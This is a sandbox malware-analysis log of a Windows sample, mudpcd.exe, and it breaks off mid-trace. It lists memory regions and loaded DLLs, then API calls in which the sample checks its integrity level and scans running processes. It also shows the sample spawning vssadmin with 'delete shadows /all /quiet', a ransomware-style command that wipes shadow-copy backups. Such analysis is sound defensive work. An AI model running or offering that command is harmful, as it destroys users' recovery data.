# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Feb 15 2019 13:52:06 # Log Creation Date: 19.02.2019 16:03:15.055 Process: id = "1" image_name = "mudpcd.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mudpcd.exe" page_root = "0x3ec17000" os_pid = "0x97c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e814" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 7 start_va = 0xf00000 end_va = 0xf05fff entry_point = 0xf00000 
region_type = mapped_file name = "mudpcd.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mudpcd.exe") Region: id = 8 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9 start_va = 0x77a40000 end_va = 0x77bbffff entry_point = 0x77a40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 11 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 12 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 13 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 14 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 149 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 150 start_va = 0x74f80000 end_va = 0x74f87fff entry_point = 0x74f80000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" 
(normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 151 start_va = 0x74f90000 end_va = 0x74febfff entry_point = 0x74f90000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 152 start_va = 0x74ff0000 end_va = 0x7502efff entry_point = 0x74ff0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 153 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 154 start_va = 0x773b0000 end_va = 0x774bffff entry_point = 0x773b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 155 start_va = 0x775f0000 end_va = 0x77635fff entry_point = 0x775f0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 156 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x0 region_type = private name = "private_0x0000000077640000" filename = "" Region: id = 157 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x0 region_type = private name = "private_0x0000000077740000" filename = "" Region: id = 158 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 159 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 160 start_va = 0x75590000 end_va = 0x7559bfff entry_point = 0x75590000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: 
"c:\\windows\\syswow64\\cryptbase.dll") Region: id = 161 start_va = 0x755a0000 end_va = 0x755fffff entry_point = 0x755a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 162 start_va = 0x75660000 end_va = 0x7570bfff entry_point = 0x75660000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 163 start_va = 0x75710000 end_va = 0x75719fff entry_point = 0x75710000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 164 start_va = 0x75a60000 end_va = 0x75a78fff entry_point = 0x75a60000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 165 start_va = 0x75a80000 end_va = 0x75b0ffff entry_point = 0x75a80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 166 start_va = 0x75b10000 end_va = 0x75bfffff entry_point = 0x75b10000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 167 start_va = 0x76f90000 end_va = 0x7702ffff entry_point = 0x76f90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 168 start_va = 0x771d0000 end_va = 0x772cffff entry_point = 0x771d0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 169 start_va = 0x77350000 end_va = 0x773a6fff entry_point = 0x77350000 region_type = mapped_file name = "shlwapi.dll" filename = 
"\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 170 start_va = 0x77550000 end_va = 0x775ecfff entry_point = 0x77550000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 171 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 172 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 173 start_va = 0x75470000 end_va = 0x75481fff entry_point = 0x75470000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 174 start_va = 0x75cc0000 end_va = 0x76909fff entry_point = 0x75cc0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 175 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 176 start_va = 0x610000 end_va = 0x797fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 177 start_va = 0x76b30000 end_va = 0x76bfbfff entry_point = 0x76b30000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 178 start_va = 0x76c00000 end_va = 0x76c5ffff entry_point = 0x76c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 179 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 180 start_va = 0x30000 end_va = 0x30fff 
entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 181 start_va = 0x7a0000 end_va = 0x920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 182 start_va = 0xf10000 end_va = 0x230ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 183 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 184 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 185 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 186 start_va = 0x930000 end_va = 0xbfefff entry_point = 0x930000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 187 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 188 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 189 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 190 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 191 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 192 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000060000" filename = "" Region: id = 193 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 194 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 195 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 196 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 197 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 198 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 199 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 200 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 201 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 202 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 203 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 204 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 205 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000060000" filename = "" Region: id = 206 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 207 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 208 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 209 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 210 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 211 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 212 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 213 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 214 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 215 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 216 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 217 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 218 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000060000" filename = "" Region: id = 219 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 220 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 221 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 222 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 223 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 224 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 225 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 226 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 227 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 228 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 229 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 230 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 231 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000060000" filename = "" Region: id = 232 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 233 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 234 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 235 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 236 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 237 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 238 start_va = 0x75450000 end_va = 0x75465fff entry_point = 0x75450000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 252 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 256 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 257 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 258 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = 
"\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 259 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 260 start_va = 0x75410000 end_va = 0x7544afff entry_point = 0x75410000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 261 start_va = 0x75720000 end_va = 0x7583cfff entry_point = 0x75720000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 262 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 263 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 264 start_va = 0x2310000 end_va = 0x2702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 265 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 266 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 267 start_va = 0xde0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 268 start_va = 0x2860000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 269 start_va = 0x75400000 end_va = 0x75407fff entry_point = 0x75400000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: 
"c:\\windows\\syswow64\\drprov.dll") Region: id = 270 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 271 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 295 start_va = 0x753d0000 end_va = 0x753f8fff entry_point = 0x753d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 296 start_va = 0x753b0000 end_va = 0x753c3fff entry_point = 0x753b0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 316 start_va = 0x75390000 end_va = 0x753a6fff entry_point = 0x75390000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 317 start_va = 0x75380000 end_va = 0x75387fff entry_point = 0x75380000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 318 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 319 start_va = 0x2a50000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 320 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 321 start_va = 0x75370000 end_va = 0x7537efff entry_point = 0x75370000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 322 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = 
private name = "private_0x00000000003d0000" filename = "" Region: id = 323 start_va = 0x2cc0000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 324 start_va = 0x75360000 end_va = 0x7536afff entry_point = 0x75360000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 325 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 326 start_va = 0x75350000 end_va = 0x75358fff entry_point = 0x75350000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 327 start_va = 0x75340000 end_va = 0x7534cfff entry_point = 0x75340000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 617 start_va = 0x530000 end_va = 0x5effff entry_point = 0x530000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 618 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 619 start_va = 0x2740000 end_va = 0x283ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 620 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 621 start_va = 0xce0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Thread: id = 1 os_tid = 0x980 [0040.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, 
TokenHandle=0x16f864 | out: TokenHandle=0x16f864*=0x80) returned 1 [0040.143] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f868 | out: TokenInformation=0x0, ReturnLength=0x16f868) returned 0 [0040.143] GetLastError () returned 0x7a [0040.143] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x19, TokenInformation=0x444640, TokenInformationLength=0x14, ReturnLength=0x16f868 | out: TokenInformation=0x444640, ReturnLength=0x16f868) returned 1 [0040.143] GetSidSubAuthorityCount (pSid=0x444648*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x444649 [0040.143] GetSidSubAuthority (pSid=0x444648*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x444650 [0040.144] CloseHandle (hObject=0x80) returned 1 [0040.144] lstrcpyW (in: lpString1=0x16f880, lpString2=" delete shadows /all /quiet" | out: lpString1=" delete shadows /all /quiet") returned=" delete shadows /all /quiet" [0040.144] CreateProcessW (in: lpApplicationName="C:\\Windows\\sysnative\\vssadmin.exe", lpCommandLine=" delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x16fa88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16facc | out: lpCommandLine=" delete shadows /all /quiet", lpProcessInformation=0x16facc*(hProcess=0x84, hThread=0x80, dwProcessId=0x984, dwThreadId=0x988)) returned 1 [0040.278] CloseHandle 
(hObject=0x80) returned 1 [0040.278] CloseHandle (hObject=0x84) returned 1 [0040.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x84 [0040.280] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.280] lstrcmpW (lpString1="[System Process]", lpString2="null.exe") returned -1 [0040.282] lstrcmpW (lpString1="[System Process]", lpString2="nan.exe") returned -1 [0040.282] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.283] lstrcmpW (lpString1="System", lpString2="null.exe") returned 1 [0040.283] lstrcmpW (lpString1="System", lpString2="nan.exe") returned 1 [0040.283] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.283] lstrcmpW (lpString1="smss.exe", lpString2="null.exe") returned 1 [0040.283] lstrcmpW (lpString1="smss.exe", lpString2="nan.exe") returned 1 [0040.283] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.284] lstrcmpW (lpString1="csrss.exe", lpString2="null.exe") returned -1 [0040.284] lstrcmpW (lpString1="csrss.exe", lpString2="nan.exe") returned -1 [0040.284] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: 
